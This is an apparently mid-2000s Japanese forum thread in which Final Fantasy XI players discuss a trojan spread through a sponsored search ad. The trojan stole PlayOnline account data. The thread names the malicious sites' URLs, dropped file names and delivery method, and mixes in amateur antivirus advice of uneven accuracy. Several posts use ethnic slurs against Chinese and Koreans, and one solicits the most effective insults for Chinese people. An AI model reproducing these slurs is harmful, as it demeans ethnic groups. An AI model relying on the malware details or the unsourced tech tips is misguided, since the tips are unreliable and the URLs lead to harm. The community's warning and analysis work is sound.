ttp://oshiete1.goo.ne.jp/kotaeru.php3?q=698358

>>208
無くなってる。
昨日の時点では広告が2個ずつあって、そのかたっぽが
罠サイトだった。

>>210
なるほどｻﾝｸｽ

svchost.exeは正常なやつもあるから
間違えて消すなよ

svchost.exe
普通に立ち上がってるｄあｓｇｆｄｊ

これ何？まずいの？？

>>202
そりゃ起動してんだろうよ。

>>202

svchost.exeって>>51氏のレスを見る限り通常は複数起動していておかしくないんじゃない？
まぁ、偽装でsvchost.exeで潜むそうだが、偽装の見つけ方誰か教えて('A`)

消しても害は無い
なんかあってからじゃ遅いから念のために消しておけ

>>179
それは違う

そういや最近「ゲーム名　攻略」で検索すると大抵出てくる胡散臭いサイトがあるな。

消すと再起動することもあるぞ・・・

手動ブラスター？ｗ

自分でブラスター・・・ﾜﾛﾀwww

>>218
あるねぇ、コンシュマとかで多分広告益狙いの文字羅列したサイト

やはりこういう重要なのはネ実は情報早くていいな

花の雫FF11情報局がスポンサーから消えたぞ

何回リロードしてもアマゾンしか出ないし、逃げたか。

そいやぁ、whois検索に例のサイトのアドレス放り込んだら
なんか情報でないのかな？

ばななに色々書いてあった
http://park11.wakwak.com/~beatnic/

ヤフーにトロイが仕組まれたサイトがスポンサーサイトとして掲載された件について質問してみたいな
セキュリティーチェックがおろそかなんじゃないかとか

>>226
ノートン先生でチェックするので件のトロイに関しては回避した。

自分で放り込んでみた。電話番号とメルアドは削除の理由にされかねんから、自粛。

＞Registrant:
＞ hagongda
＞ haerbin 150001
＞ china
＞ Phone: （自粛） Fax:
＞ Domain name: JAPAN213.COM
＞ Administrative Contact:
＞ hagongda wlmx009@（自粛）

>>225
宣言どおり転載しますた

AVGのオレはどうすればいいですか

てか思ったんだが結構感染してるやついるんじゃね？

>>202
落ち着いてくれ。俺は５つだ（´ー｀）

トロイとか気になる人はSpybotSDあたりで検査してみるのもいいと思う
Avast使ってるんだが、それでも発見できない奴とかが見つけられたりする

これからこの手のサイトどんどん作られていくんだろうか・・・
うかつにリンク踏めないな

大規模にキャラつぶされる予感

ps2でやってるから無問題

装備やギルごっそり抜かれたあとキャラ削除
奪ったギルやアイテムをRMTへ

中華も自分で稼ぐよりその辺のキャラのアイテム強奪する手段のほうが
手っ取り早いとおもったのかも。

中華のギル買ってアイテム買ったやつのキャラ奪ってアイテム戻せばｳﾏｰかお！

もう中華死ぬがいいお！

中華ﾃﾗｷﾓｽ

ほんとクソだな

>>235
いやいやPS2でも同じネット回線使ってるなら抜かれる

ちょっと今までの流れを誰か解説してクレクレ

>>239

>>239ヤバイ！俺のバーミリがッッ

>>239
史上類を見ないほどにテラオソロシス
俺のホーネットニードルがっ

被害者は既に国センで取り上げられるくらい出てる
>>126

■の腐った対応で泣き寝入りみたいだね

他のスレ上げるなぼけーーーーーーー

>>126

俺のポポトイモがーーーっっ

スキャンしたら1個だけ　key loggerが('A`)

avastでスキャンかけたらノートン検出しやがったｗ
AVが流れてますとかどうのこうのと。

ノートン入っているのですが、さらにAvast入れたらまずいですかね？

>>248
やばい、おれの豊丸の無臭性動画が中華の手に；；
ｵｿﾛｼｽ；；；

ノートンを消せばいいじゃない

ついでにその検体を各ベンダーに送ってもらえると救われる人が増えるぞっと。

アンチソフトって競合できないんじゃなかったっけ

と、さっきスパイウェア検査したら７つ出てきたエロスが言ってみる

まじシナチク最悪だな。
シナとチョンがいなくなったらどれほど平和なことか・・・
お前らいつもアホみたいに国旗燃やしてる場合かっての。

とりあえず、ノートン切ってみました。
赤く点滅していて、気になりますが

ｼﾅﾁｸに比べると姦国なんかぜんぜんマシだなｗ

ｼﾅﾁｸを軽蔑、侮辱できる最も効率的な言葉とかってない？？ｗ

ちなみに
cao ni ma
とかどういう意味だっけ？ｗ

http://search.yahoo.co.jp/search?p=%B2%D6%A4%CE%BC%B6FF11%BE%F0%CA%F3%B6%C9&fr=my-top&src=my-top&search.x=30&search.y=11

これ？

>>256お前の母親を犯してやる
じゃなかったっけ？

>>255
切るだけではダメ
確かアンインストしないと他の入れれないはず

spybotでトロイも検出できませんか？
avastサイト英語なので更新とかやり辛いので
ノートンとspybotで凌げれば幸いなのですが

>>260
スパイウェアとウィルスの違いを知ろうな

あと、SpybotよりもAd-wareのがいい

orz　そうなのですか。２５９さんありがとう。
さっきから、２分に１回位の間隔で、「DCOM　Exploitからのの攻撃を遮断しました」
って表示されるのですが、これって普通ですかね

>>262
うざいなら切っておけ
「DCOM　Exploitからのの攻撃を遮断しました」
ってのはほとんどスパイウェアだがたまにトロイも混じっている事もあるから注意。

ネットにつなぐだけでこんだけ危ういのがわかったならよし

>>261
いや両方入れたほうがより安全。
どちらかAd-wareだけでも大体の処理ができるが
spybotはレジストリにちょっとでも怪しい文章列があっただけでも検出する。
その為、必要なものまで検出する可能性があるが
リカバリで修復可能。

ノートンと>>23の共存してるよ？俺のＰＣ　

>>261
Spybotは免疫機能があるから楽だね。

一度引っかかったスパイウェアは自動的に遮断

>>260
ここでavast日本語訳されてるのもあるよ
ttp://www.iso-g.com/

＞２６３
　ありがとう。ノートンの時はこのような表示なかったからビビリました

＞２６５
　avastですか？

>>268
それそれ

PS2で3307エラーでるのはナゼ

＞２６９
　私は両方起動させると、ネットに接続できなくなりますた。
　なぜだろう。。。

login_w.binファイルをクリックすると
POLを起動してるわけでもなく使用中だからむやみに開くな、ぽいメッセージが出るわけだが
これやばくね？

>>271
FWやAVの類は排他で使うこと。
相互補完が利くのってaVast!-ZonealarmとSpybot-adAwareくらいだろ

普通にWindowsUpdateしてりゃ食らわないんじゃねーの?

>>274
Updateは常に後手だから必ずしも安心とは言えんな

中華サイトから落としてきたニセsvchost.exeはexploreff.exeにリネームされて
C:\WINDOWS\system32にコピーされる。
さらに>>75の言うとおり、自動起動プログラムとしてレジストリに登録されて、
次回のWindows起動時に常駐する。

でも、Windows XP Pro SP2で試したら、Windowsの起動時にこんなダイアログ
ボックスが開いた。
http://tune.ache-bang.com/~vg/outitem/up/img/6177.png

デジタル署名でひっかかってやんのwww

WinXPSP2を完全破壊は無理だろうな・・かなり硬い

>>276
吹いたｗｗｗｗｗｗｗｗｗｗｗ

SP2ファイアウォールツヨスｗｗｗ

>>276
間抜けすぎるｗｗｗｗｗｗｗ

とりあえず、あげ

33 ：1：2005/10/21(金) 22:46:02 ID:tUJ4NgNG
想定シナリオ（漏れに関する）


1. キャラ削除事件が相次ぐ

→ だから言ったじゃないか！（得意げ）

2. ナニも起きない

→ 漏れの警告のおかげでナニも起きなかったな！（得意げ）


スレ立った時点で漏れ得意げ確定。


ワロスｗｗｗ
でも>>1GJ！

SP2ならデジタル署名でひっかっかるだって？ｗｗｗｗ

ﾌﾟｰｸｽｸｽｗｗｗｗｗｗｗｗｗｗｗｗ
間抜けにも程がある所詮ｼﾅﾁｸｗｗｗｗｗｗｗｗｗｗｗｗ

ぜんぜん騒ぐほどのもんじゃないんだなｗ

J-Word(中国製スパイウェアコンポーネント)だって署名くらい付くのにな
まぁ、明らかにやばいスパイだから足がつくとまずいわけか

c:にwindows入れてない俺は勝ち組

とりあえずage
これはやばいだろ

>>283
それでもノートン先生ならスルーしてくれる！

つーか周りにJ-Wordツールバー使ってるやつ多すぎ。
日本語キーワードでどうのこうのと言ってIEに取り付くやつな。
中国大手のサーチエンジンだった3721.com
(現在はYahoo!が買収)謹製のスパイだぞありゃ。
アンインスコがすげー面倒。

罠サイト踏んだマシンがDDoSの踏み台にされてる可能性は？

大有り

>289
あるあるｗ

age推奨？

推奨で

>>292
力強く推奨！承認！

>>283
でもそれを異常、と思わない香具師が
少なからずいることが予想できるから脅威と言えば脅威

マカフィー入れてるんだけど、
↑の方に出てたソフトをインストする時って、
マカフィはアンインストせんとあかんかな？

ＰＣの事良くわからん・・・教えてエロイ人。

RMTサイトとかもヤバイのありそうだな
てかむしろそっちが本拠地かも。
こんな怪しいサイトに行くやつがそんなにいるわけないし

>>296
相性による。
アンチウィルスソフトには駐在と非駐在があるが
駐在同士のソフトだとソフト同士の競合により起動しないこともあるからやめておくのが吉。

スパイウェア削除ソフトはウィルスソフトと同時に入れても問題はなし。


ちなみに駐在ソフトはマカフィ、ノートン、avast!,antivir,bitdefender(課金版)等。

>>298
わかりやすい説明ありが�d(・ω・)

Jwaｒｄアンインスコﾒﾝﾄﾞｸｻｽ

バスターとavast、現在同時に常駐させてる。

msnとyahooでは表示されなくなってるみたいね

ヒロフミとオマンコ大好きｌｓリスト （蹴鯖）

hirofumi Mich satoyuki Jing Loeb Ary Bosco Hira
Hattrick Biank Itomichi Katusina Leticia Cseila
cervantes tohru Tada Yale Tiger Ujimaru
Enduro Youcantdoit Ricdias Utopia

詳細はここで
【おつかれｗ】No.22Cerberus総合81蹴目【おまえもなｗ】
http://yy33.kakiko.com/test/read.cgi/ff11/1128971869/

この件スレ立ってたのか。
昨日踏んでマカフィーが反応したんで驚いたよ。

おいおい
POL自身がスパイウェアだろうがｗ

下がりすぎ

>>1のサイト、ドメインサーチしたらハルビンって出たよ。満州かよ。

まとめ

・中華RMT業者と思わしき者が罠サイト作って
　POLアカウント情報を抜くウイルス（トロイ）を仕掛けていた

・罠サイト突如消える

・ばななの人のところで特集（詳しくはこちら）
http://park11.wakwak.com/~beatnic/

>>308
罠サイトは消えていない。Yahoo!とMSNのスポンサーサイトから外されただけ。

もしもし１よ１さんよーせかいのうちでーおまえほどー

>>309
あー、すまんこ

うほｗ
スポンサーから消えただけでもザマーみそづけｗって感じｗ

Windows XP Pro Goldでも試してみた。
%SYSTEMROOT%\system32に3つのファイルを作ってる。
i.com、exploreff.exe、systemlff.dll。i.comとexploreff.exeは同じもの（ニセsvchost.exe）。
もうひとつのDLLはなんだか分からないけど、例のアヤシイ文字列がたくさん含まれる。

FFをインストールしていない環境ではいまのところおかしな通信はしていないもよん。
POLとかFFがインストールされてると挙動が変わるんだろうなぁたぶん。

これはさすがにスクエニに通報しなくて良いのか・・・？
もちろん警察にも

>>313
XP　Pro　Goldってなに？
ゴールド版ってのが出てるのかな？

ttp://www.japan213.com/ は単なる入り口に過ぎない。
ttp://www.1102213.com/ff11help/money.htm
にフレームが飛んでいて、こいつが悪の元凶。
JavaScriptでsvchost.exeをいきなり食わせるという暴挙に出る。
またmk:プロトコルを使って食わせる。これについては
IEのバージョンを判定し攻撃できないと悟った場合は悔し紛れに
ttp://www.1102213.com/ff11help/money1.htm
経由でMicrosoftIISのHTTP404エラーを真似た画面を出す(ブラクラ狙い?))。
money1はコメントが英語であることや、headに
他には書いていないdoctypeを行儀よく書いてあることから
海外のいたずらHTML(かExploit)系サイトからコピペ改変したものと思われる。
money1が生成する偽のエラー画面には以下のテキストがある。
IcyFox76416026 IcyFoxLovelace IcyfoxYHG
IcyFoxについては後述する。

>>314
■に通報しても握りつぶすだけだから無駄。通報するなら警察だけに汁。
突然警察に捜索入られて、これまでのログ解析されて
これまで握りつぶしてきた分も一気に情報をあらわにされた、な〜んて事になったら楽しいなっと。

さて、スパイ本体が設置してある www.1102213.comトップには
「島田RagnarokOnline研究室」があり、上記サイトと同様ファイル名は中国語のピンインっぽく
www.japan213.com と同一人物(グループ)の可能性が高いが、これがなんと全くの無害である。
ROプレーヤまたは関係者(ROのRMT業者?)のFFXIに対する攻撃という可能性を提示しておく。
また、このホストはページ下記に表記のある http://www.ragnarok-jp.com/ と同一IPである。
なおROをやっていないので「島田RagnarokOnline研究室」がどの程度知られているかは知らない。
もし有名な所らROコミュニティで叩いてくれると嬉しい。

IcyFoxについて補足する。
wohisでは www.icyfox.com や www.icyfoxlovelace.com などの
ドメインが存在し、上記ドメインを含め全て中国のDNS 51.net に
登録されていることからスパイコンポーネントはこいつが主犯と思われる。
また本来 IcyFox は特にFFをターゲットとしたというよりは
中国国内でポピュラーなスパイウェアのようで、
ググると中国語の掲示板やblogでの駆除方法が散見される。
中国国内でしか広まっていないスパイウェアということで米国ベンダーではあまり知られておらず
http://www.sophos.co.jp/virusinfo/analyses/svl.cgi?virus=Troj/Icyfox-A&lang=17
程度しか引っかからないので、Norton、McAfee、バスターなどはあまり頼りにならない。
むしろ(日本では安かろう悪かろうと言われている)中国製の
ウィルスドクターやウィルスキラーが対策済みであるｗｗｗ

でもFFが初めてのMMOで慣れないパソコンを触っている人も多数居るのも事実
このスレの住人のように検証してくれる人がいるとマジ助かります

>>315
あ、すまそ。SP未適用の初期バージョンのこと＜Gold

名無しに戻ります。
島田RagnarokOnline研究室まじで(現時点では)無害なので目的がわかりません。
ROのRMT業者による、日本人をROに必死に勧誘するサイトとしか見えない。
だとすると今回のスパイ攻撃は(ユーザ、業者関係なく)FFそのものをまとめて攻撃し
FFを解約してROに来て(RMTして)くれという意図なんだろうか。

DDoSもこいつらか?

RO業者オソロシス

例のぷれみあさいと(gameinside.info)では、
この話題は触れられてないみたいだね。
TOPに出ててもおかしくなさそうな情報なんだがな。

>>322
長きにわたる任務ご苦労。シグネットをかけてやろう。
業者ｵｿﾛｼｽ

>だとすると今回のスパイ攻撃は(ユーザ、業者関係なく)FFそのものをまとめて攻撃し
>FFを解約してROに来て(RMTして)くれという意図なんだろうか。

うはｗ深読みしすぎｗｗｗ
でも事実ならそろそろsageと無意味なスレ上げ攻撃がはじまるかもなー

単純に日本を攻撃する意図なら島田研究室にもスパイ付けると思うんだわ。
韓国のゲームだと言っても日本語ページ(エンコード指定間違ってるけど)、
内容も日本人向けだし(注:ROは言語別サーバ)。

ウイルスハンタープロジェクト
http://www.trendmicro.com/jp/security/virushunter.htm

ブツもらた香具師、上の所に送ったらウィルスバスターも対応してくれるかも試練。勇者求む

このサイト、ウィルス対策ソフト作ってる会社に通告して
調べてもらうのもありでしょ。もう通告した人おるんかな？

まぁ、どちらにせよバスターやノートンは、もう信用出来ないけどね…

なんにしても明らかに危険なのに
■は一切発表がないのね。

つまりアクセス問題の原因はお前らのPCだっつう事だなW

この一連の流れをヤホー掲示板にコピペして
ヤホーの管理責任は追及することはでんきないのかねえ？
スパイウエアを感染させるようなｈｐがスポンサーなんて
舐めてるとしか思えない

login_w.bin
が漏れのとこにもあるよ。ﾔﾊﾞｽ？

とりあえずageてこうぜ！

WindowsXPのノンパッチで突撃してみた（FFはｲﾝｽｺしてない香具師）
感染までの詳しい動作はめんどくさいから書かんけど
タスクマネージャ開いて、プロセスに
exploreff.exeまたはi.comがいなければ、大丈夫と桃割れ。
信じる信じないはあなた次第(・∀・)

倉庫でイベント行ってボソっと「東亜病夫」ってsayしたら鬼のようにﾋﾟﾝｲﾝtellが来たｗｗｗｗｗｗｗｗ

>>335
和訳ｷﾎﾞﾝﾇ。東アジアの病原菌って意味か？